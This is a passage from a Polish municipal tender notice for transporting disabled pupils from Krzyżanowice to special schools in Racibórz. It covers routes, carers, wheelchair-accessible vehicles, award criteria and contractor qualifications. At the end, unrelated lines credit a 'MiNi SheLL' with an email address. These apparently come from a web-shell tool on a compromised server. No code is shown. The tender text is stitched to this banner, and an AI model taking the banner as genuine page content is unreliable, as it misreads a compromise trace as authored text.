Krzyżanowice w roku szkolnym 2022/2023 rozpoczynając od 01.09.2022 r. obejmuje dowóz wg prognoz:<br/>-11 uczniów niepełnosprawnych z Zabełkowa, Roszkowa, Krzyżanowic, Tworkowa, Rudyszwałdu, Bieńkowic do Zespołu Szkół Specjalnych w Raciborzu, ul. Królewska 19, 47-400 Racibórz; <br/>-4 uczniów niepełnosprawnych z Owsiszcz, Chałupek, Tworkowa i Roszkowa do Specjalnego Ośrodka Szkolno-Wychowawczego dla Niesłyszących i Słabosłyszących w Raciborzu, ul. Karola Miarki 4, 47-400 Racibórz;<br/>-1 uczeń niepełnosprawny z Rudyszwałdu do Zespołu Szkół Specjalnych w Raciborzu, ul. Królewska 19, 47-400 Racibórz oraz do Centrum Rehabilitacji Osób Niepełnosprawnych, ul. Rzeźnicza 8, 47-400 Racibórz<br/>-2 uczniów niepełnosprawnych z Chałupek i Tworkowa do Szkoły Podstawowej nr 1 z Oddziałami Integracyjnymi im. Powstańców Śląskich w Raciborzu, ul. Cecylii 30, 47-400 Racibórz.<br/><br/>Transport każdego dnia rano winien rozpocząć się od Chałupek, poprzez Zabełków, Rudyszwałd, Roszków, Krzyżanowice, Owsiszcze, Tworków, Bolesław i Bieńkowice <br/>do Raciborza i odwóz z Raciborza odwrotną trasą. Uczniowie będą wsiadać i wysiadać tylko w miejscach wyznaczonych. Dokładne godziny dowozu i odwozu uczniów uzależnione <br/>są od ich rozkładu zajęć w poszczególnych placówkach. Na trasie Chałupki – Racibórz i powrotnej dowożeni są uczniowie, którzy poruszają się na wózku inwalidzkim. <br/>b)	dowozie 2 uczniów niepełnosprawnych odrębnym pojazdem z Roszkowa do Szkoły Podstawowej im. Gustawa Morcinka w Krzyżanowicach, ul. Łąkowa 12, 47-450 Krzyżanowice w dniach nauki szkolnej oraz odwozie w roku szkolnym 2022/2023 odliczając przerwy świąteczne i ferie zimowe. Wykonawca winien zapewnić do przewozu ucznia niepełnosprawnego wraz z opiekunem pojazd wyposażony w miejsca siedzące i pasy bezpieczeństwa. Transport każdego dnia rano winien rozpocząć się od Roszkowa do Krzyżanowic i odwóz po zajęciach z Krzyżanowic odwrotną trasą. Wsiadanie i wysiadanie ucznia tylko w miejscach wyznaczonych. Dokładne godziny dowozu i odwozu ucznia uzależnione są od ich rozkładu zajęć Szkoły Podstawowej im. Gustawa Morcinka w Krzyżanowicach.<br/>2)	Transport uczniów odbywał się będzie dwa razy dziennie tj. rano i popołudniu, zapewniając dowóz uczniów niepełnosprawnych z miejscowości Gminy Krzyżanowice do placówek oświatowych na terenie Powiatu Raciborskiego przed rozpoczęciem zajęć i ich odwóz z placówek oświatowych po zakończeniu zajęć, każdego dnia nauki szkolnej, najkrótszą możliwą drogą. Ostateczne godziny przyjazdów i odjazdów pojazdów należy uzgadniać na bieżąco z Dyrektorami placówek oświatowych do których będą dowożeni uczniowie. <br/>3)	Wykonawca winien zapewnić opiekę osoby dorosłej podczas przewozu. Zamawiający zastrzega, iż opiekunem nie może być osoba kierująca pojazdem. Usługa przewozowa obejmuje zorganizowany dowóz oraz odwóz i zapewnienie opieki począwszy od odbioru osób z wyznaczonych lokalizacji, pomocy opiekuna w czasie wsiadania, wysiadania <br/>i przewozu, aż do momentu odprowadzenia dzieci do odpowiedniej placówki czy ośrodka, <br/>a także pomoc w rozładunku i załadunku sprzętu rehabilitacyjnego. <br/>4)	Pojazd powinien być przystosowany do przewozu osoby poruszającej się na wózku inwalidzkim, tj. posiadać na wyposażeniu windę dla osób niepełnosprawnych lub szyny umożliwiające wjazd wózkiem do pojazdu. Ponad to w każdym dowodzie rejestracyjnym pojazdu przeznaczonego do przewozu winny być zawarte adnotacje: Przewóź osób niepełnosprawnych.<br/>5)	Wykonawca zapewni pojazdy w ilości i o takiej liczbie miejsc, która odpowiada zakresowi wymaganych usług, które powinny być sprawne i winny posiadać aktualne badanie techniczne, oraz zagwarantuje w razie każdorazowej awarii pojazdu transport zastępczy, który będzie podstawiony w czasie nie dłuższym niż 60 minut od wystąpienia awarii. Pojazdy powinny spełniać wszystkie wymagania przewidziane prawem w tym podstawowe warunki sanitarno-higieniczne. Wykonawca ponosi pełną odpowiedzialność za stan techniczny i właściwe oznakowanie pojazdów służących do realizacji zamówienia oraz kwalifikacje osób realizujących zamówienie, na zasadach określonych w odrębnych przepisach. Zamawiający zastrzega sobie prawo do sprawdzenia stanu technicznego pojazdów oraz kwalifikacji osób tj. opiekuna i kierowcy. Pojazdy przewożące dzieci oraz osoby realizujące zamówienie nie mogą zabierać innych osób bez zgody Zamawiającego.<br/>6)	W przypadku odmiennej organizacji pracy danej placówki oświatowej i skrócenia zajęć lekcyjnych, Wykonawca zapewni odwóz uczniów we wcześniejszych godzinach ustalonych z Zamawiającym. Zmieniona organizacja odwozów nie stanowi dodatkowych zadań, należy<br/>ją wkalkulować w cenę ryczałtową.<br/>7)	W okresie występowania na terytorium RP stanu zagrożenia epidemicznego lub stanu epidemii lub innego o podobnym skutku Wykonawca zobowiązany jest do przestrzegania obowiązującego reżimu sanitarnego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Przedmiotem II części zamówienia jest usługa polegająca na:<br/>a)	dowozie ok 18 uczniów niepełnosprawnych z terenu Gminy Krzyżanowice do placówek oświatowych na terenie Powiatu Raciborskiego oraz ich odwozie w roku szkolnym 2022/2023, w dniach nauki szkolnej odliczając przerwy świąteczne i ferie zimowe - około 188 dni w zaplanowanym okresie, począwszy od 01.09.2022 r. do 23.06.2023 r. Faktyczna ilości dni nauki szkolnej będzie wynikać z ilości dni dowozu dzieci niepełnosprawnych, przedstawionych przez Wykonawcę w wykazach dni załączonych do faktur miesięcznych i zweryfikowanych przez Zamawiającego.<br/>Przewidywana liczba uczniów, w skali miesiąca ma charakter prognozowany i może ulec zmianie. Wykonawca umożliwi Zamawiającemu bezkosztowe odchylenie od przewidywanej ilości uczniów o co najmniej 10 % - 2 uczniów (w dół i w górę). Wskazaną tolerancję należy rozumieć jako prawo opcji, ustalone przez Zamawiającego w rozumieniu zapisów art. 441 ust 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, (t.j. Dz.U. z 2021 r. poz. 1129) zgodnie z którym minimalna liczba uczniów niepełnosprawnych do przewozu wynosi 16 uczniów, a maksymalna wynosi 20 uczniów. <br/>W związku z miesięcznym wynagrodzeniem ryczałtowym za ilość uczniów przewożonych w miesiącu, taka zmiana ilości uczniów w trakcie roku szkolnego nie będzie stanowić podstawy do wnoszenia roszczeń przez Wykonawcę, co do ilości faktycznie dowożonych dzieci w toku realizacji umowy. W związku z tym Wykonawca winien zapewnić w pojazdach miejsca siedzące wyposażone w pasy bezpieczeństwa, służące do przewozu 20 uczniów niepełnosprawnych wraz z opiekunem - ilość odpowiadająca maksymalnej ilości uczniów wynikających z prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ofertą najkorzystniejszą zostanie wybrana ta oferta, która otrzyma łącznie najwyższą ilość punktów w kryterium cena brutto 1 dzień dowożenia i czas podstawienia pojazdu zastępczego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1)	dotyczące zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa tego warunku udziału w postępowaniu.<br/>2)	dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>-spełnieniem tego warunku będzie posiadanie koncesji, zezwolenia lub licencji na publiczny transport drogowy. Warunek uznaje się za spełniony jeżeli Wykonawca przedstawi co najmniej jeden z wyżej wymienionych dokumentów. Warunek dotyczy każdej części zamówienia.<br/>3)	dotyczące sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa tego warunku udziału w postępowaniu.<br/> <br/>4) dotyczące zdolności technicznej lub zawodowej:<br/>a)	wykonanych usług<br/>należy złożyć wykaz usług wykonanych(załącznik nr 4), a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie.<br/><br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał:<br/>-dla I części zamówienia – minimum jednej usługi przewozu dzieci do placówek oświatowych w okresie całego roku szkolnego o wartości minimum 90.000 zł brutto;<br/><br/>-dla II części zamówienia – minimum jednej usługi przewozu dzieci niepełnosprawnych do placówek oświatowych w okresie całego roku szkolnego <br/>o wartości minimum 50.000 zł brutto. <br/><br/>Powyższe usługi winny być potwierdzone dowodami czy zostały wykonane lub <br/>są wykonywane należycie przy czym dowodami o których mowa są referencje, bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/><br/>b)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego.<br/>należy złożyć wykaz osób (załącznik nr 3), które będą uczestniczyć w wykonywaniu zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje <br/>n/w osobami:<br/><br/>-dla I części zamówienia – min. 4 kierowcami z odpowiednimi uprawnieniami.<br/><br/>-dla II części zamówienia – min. 1 kierowcą z odpowiednimi uprawnieniami.<br/><br/>c)	wykazu narzędzi <br/>należy złożyć wykaz narzędzi (załącznik nr 5) które dostępne są dla Wykonawcy w celu wykonania zamówienia publicznego wraz z informacja o podstawie dysponowania tymi zasobami<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje <br/>n/w zasobami:<br/><br/>-dla I części zamówienia – min. 4 sprawnymi technicznie autobusami o liczbie miejsc min. 49 każdy lub taką ilością autobusów i o takiej liczbie miejsc które zapewnią przewóz min. 188 dzieci;<br/><br/>-dla II części zamówienia – posiadanie samochodu dostosowanego do przewozu osób poruszających się na wózku inwalidzkim, tj. posiadających na wyposażeniu windę dla osób niepełnosprawnych lub szyny umożliwiające wjazd wózkiem do pojazdu oraz w dowodzie rejestracyjnym pojazdu przeznaczonego do przewozu poruszających się na wózku inwalidzkim winny być zawarte adnotacje: „Przewóź osób niepełnosprawnych”. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych<br/>Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 7 do SWZ),<br/>b)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej (KRS, CEIDG).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a)	wykaz usług wykonanych (załącznik nr 4) a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów <br/>– oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>b)	wykaz osób (załącznik nr 3), skierowanych przez Wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami.<br/>c)	wykaz narzędzi, które dostępne są dla Wykonawcy w celu wykonania zamówienia publicznego wraz z informacja o podstawie dysponowania tymi zasobami – zgodnie z opisanym warunkiem w pkt. 5.3.c) (załącznik nr 5 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zostały określone w pkt. 6.1 pkt 12) SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki cywilne) oferta musi spełniać wymagania określone w art. 58 ustawy Prawo zamówień publicznych.<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania jednej oferty przez dwa lub więcej podmiotów np. konsorcjum, spółkę cywilną).<br/>2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedłożą wraz z ofertą stosowne pełnomocnictwo. Nie dotyczy to spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Pełnomocnictwo, o którym mowa powyżej, może wynikać albo z dokumentu pod taką nazwą albo z umowy podmiotów wspólnie składających ofertę (dołączonej do oferty).<br/>4)	Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5)	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia (żaden z Wykonawców wspólnie składających ofertę nie może podlegać wykluczeniu z postępowania, co oznacza, iż oświadczenie w tym zakresie musi złożyć każdy z Wykonawców składających ofertę wspólną; oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie).<br/>6)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy- zgodnie z art. 117 ust. 4 ustawy Pzp. - (załącznik nr 10 do SWZ) - jeżeli dotyczy.<br/>7)	Dopuszcza się, aby wadium zostało wniesione przez pełnomocnika (lidera) lub jeden z podmiotów wspólnie ubiegających się o udzielenie zamówienia, przy czym jeżeli wadium zostanie wniesione w formie innej niż pieniądz, z treści dokumentu wadium musi wynikać, iż zabezpiecza ono ofertę złożoną przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8)	Wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Jeżeli dokumenty potwierdzające spełnienie warunków będą określały wartość w walucie obcej to Zamawiający przeliczy tą wartość na PLN wg średniego kursu NBP na dzień którego określona wartość się odnosi (np. zakończenie realizacji robót). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Dopuszcza się zmiany wynagrodzenia wynikającego z umowy w przypadku: <br/>1)	zmiany realizacji sposobu wykonana przedmiotu zamówienia z powodu okoliczności niezależnych od stron umowy, np. znacznego wydłużenia trasy,<br/>2)	zmiany liczby dzieci, w ramach przewidzianej opcji,<br/>3)	zmiany zakresu przedmiotu zamówienia pod warunkiem, że są korzystne dla Zamawiającego, lub zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i które warunkują zrealizowanie przedmiotu zamówienia.<br/>4)	zmiany przepisów prawa, w szczególności zmiany podatku VAT oraz dotyczących transportu osób w zakresie mającym wpływ na realizację przedmiotu zamówienia, w szczególności zmiany organizacji publicznej komunikacji zbiorowej oraz zmiany ustawy o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego. <br/>2.Dopuszcza się zmiany terminu wynikającego z umowy w przypadku zaistnienia po zawarciu Umowy, zdarzeń o charakterze siły wyższej, niezależnych od stron, które uniemożliwiłyby terminowe wykonanie zobowiązań, Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu wykonania przedmiotu niniejszej umowy. Za siłę wyższą przyjmuje <br/>się zdarzenie zewnętrzne, którego strony nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogą przeciwdziałać, a które uniemożliwia wykonawcy wykonanie w części lub w całości jego zobowiązań.<br/>3.Zamawiającemu przysługuje prawo zmniejszenia wynagrodzenia w przypadku:<br/>1)	rezygnacji z części zakresu usług przewidzianych do wykonania,<br/>2)	zmiany liczby dzieci, w ramach przewidzianej opcji,<br/>3)	w przypadku zmiany stawki podatku VAT.<br/>4. Wszystkie powyższe postanowienia stanowią katalog zmian, które przed wprowadzeniem do umowy wymagają zgodnej akceptacji stron umowy z wyłączeniem postanowień określonych w ust. 16.3 SWZ gdzie podjęcie decyzji o zmniejszeniu wynagrodzenia nie wymaga akceptacji Wykonawcy.<br/>5.W pozostałym zakresie do zmian do umowy stosuje się art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-01 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com